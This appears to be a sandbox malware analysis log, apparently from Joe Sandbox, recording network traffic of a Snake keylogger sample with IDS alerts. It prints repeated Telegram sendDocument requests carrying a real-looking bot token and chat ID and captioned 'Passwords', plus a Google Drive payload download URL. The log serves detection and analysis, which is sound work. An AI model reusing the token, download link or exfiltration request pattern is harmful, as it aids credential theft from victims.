            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50048 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50048 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50044 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50044 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50036 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50036 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd317e95a26f14Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3194e69a35feHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a596b280c7Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31bbc6a3946aHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31d345a4d69dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e7ef48443fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31fb2850ffeeHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd320cf48f9ec6Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd322011935a6cHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32332070e6dbHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd324620a0f79fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32591250daf8Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd326ea7100d5cHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd328179a8fd74Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32943d993b6fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32a447bdac83Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32b6f09fd9a8Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32c98ada1a3cHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32dc17249353Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32ed42a59927Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32ffb2387d02Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3312139f8085Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd332704d874a7Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd333e80865cbdHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33534ee742fcHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33695988c9e0Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd338331fbf071Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3399184f1d9fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33b17f5f6303Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33d7e388cba5Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33f3f04ae1a8Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3418cac0da0cHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd344def382758Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd347dd0bc2292Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd349e790014a9Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd317ebe20a167Host: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49979 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49975 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49973 -> 142.250.185.110:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1t3Ywt6vnH907sJTvu0e7Lz4I8WNHZFcN HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1t3Ywt6vnH907sJTvu0e7Lz4I8WNHZFcN&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49977 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1t3Ywt6vnH907sJTvu0e7Lz4I8WNHZFcN HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1t3Ywt6vnH907sJTvu0e7Lz4I8WNHZFcN&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
